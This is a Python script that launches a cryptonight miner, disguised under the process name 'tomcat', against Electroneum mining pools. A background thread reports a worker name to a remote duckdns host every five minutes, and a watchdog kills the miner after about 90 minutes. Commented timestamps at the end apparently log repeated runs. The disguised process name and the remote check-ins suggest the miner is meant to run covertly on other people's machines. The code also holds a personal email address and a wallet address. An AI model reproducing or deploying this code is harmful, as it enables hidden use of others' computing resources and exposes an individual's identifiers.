import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:07.197946
#2018-02-17 17:18:05.057489
#2018-02-17 19:06:06.591581
#2018-02-17 20:56:08.176175
#2018-02-17 22:42:03.954241
#2018-02-18 00:25:07.355718
#2018-02-18 02:16:01.428428
#2018-02-18 04:03:06.752950
#2018-02-18 05:52:01.447354
#2018-02-18 07:42:01.518303
#2018-02-18 09:28:07.121108
#2018-02-18 11:14:01.588863
#2018-02-18 13:01:01.484678
#2018-02-18 14:48:06.177359
#2018-02-18 16:35:05.618744
#2018-02-18 18:24:03.601924
#2018-02-18 20:11:01.398244
#2018-02-18 21:56:06.798293
#2018-02-18 23:45:08.356739
#2018-02-19 01:31:05.267298
#2018-02-19 03:19:05.930024
#2018-02-19 05:04:04.058496
#2018-02-19 06:49:01.751077
#2018-02-19 08:38:07.285076
#2018-02-19 10:27:03.914954
#2018-02-19 12:15:08.519151
#2018-02-19 14:03:06.174328
#2018-02-19 15:52:06.211361
#2018-02-19 17:41:09.924183
#2018-02-19 19:30:08.943330
#2018-02-19 21:19:05.252766
#2018-02-19 23:06:03.578767
#2018-02-20 00:53:07.190736
#2018-02-20 02:42:08.476511
#2018-02-20 04:32:05.998215
#2018-02-20 06:16:04.671654
#2018-02-20 08:01:05.537634
#2018-02-20 09:46:04.798876
#2018-02-20 11:30:08.636752
#2018-02-20 13:18:01.470283
#2018-02-20 15:02:05.793210
#2018-02-20 16:46:01.985957
#2018-02-20 18:34:06.178115
#2018-02-20 20:24:05.159920
#2018-02-20 22:09:07.178606
#2018-02-20 23:49:06.492184
#2018-02-21 01:34:01.557544
#2018-02-21 03:21:07.476374
#2018-02-21 05:08:05.334537
#2018-02-21 06:56:05.364181
#2018-02-21 08:45:09.888324
#2018-02-21 10:31:04.824566
#2018-02-21 12:19:06.452242
#2018-02-21 14:07:08.737734
#2018-02-21 15:54:10.194398
#2018-02-21 17:46:06.438033
#2018-02-21 19:33:04.507170
#2018-02-21 21:21:04.582692
#2018-02-21 23:09:01.497926
#2018-02-22 00:59:03.778949
#2018-02-22 02:48:07.759156
#2018-02-22 04:33:07.578932
#2018-02-22 06:18:06.818520
#2018-02-22 08:04:05.193706
#2018-02-22 09:52:01.982271
#2018-02-22 11:36:08.230211
#2018-02-22 13:23:05.262534
#2018-02-22 15:11:06.606013
#2018-02-22 16:54:09.181774
#2018-02-22 18:42:05.085512
#2018-02-22 20:34:07.804823
#2018-02-22 22:20:05.327323
#2018-02-23 00:06:06.283282
#2018-02-23 01:54:05.806032
#2018-02-23 03:41:07.608145
#2018-02-23 05:27:05.000018
#2018-02-23 07:14:01.227041
#2018-02-23 09:19:01.729796
#2018-02-23 11:24:06.360222
#2018-02-23 13:15:03.132130
#2018-02-23 15:02:08.487547
#2018-02-23 16:52:09.579044
#2018-02-23 18:42:05.023674
#2018-02-23 20:31:01.450945
#2018-02-23 22:18:01.948308
#2018-02-24 00:04:01.333195
#2018-02-24 01:53:04.857864
#2018-02-24 03:43:05.027885
#2018-02-24 05:31:02.196068
#2018-02-24 07:17:06.089900
#2018-02-24 09:06:07.246042
#2018-02-24 10:42:05.082506
#2018-02-24 12:28:06.743811
#2018-02-24 14:01:07.792302
#2018-02-24 15:37:01.914673
#2018-02-24 17:18:01.297491
#2018-02-24 18:49:06.345348
#2018-02-24 20:22:04.914462
#2018-02-24 21:50:01.808667
#2018-02-25 00:32:06.446433
#2018-02-25 02:38:06.575045
#2018-02-25 06:10:09.159516
#2018-02-25 11:39:05.592997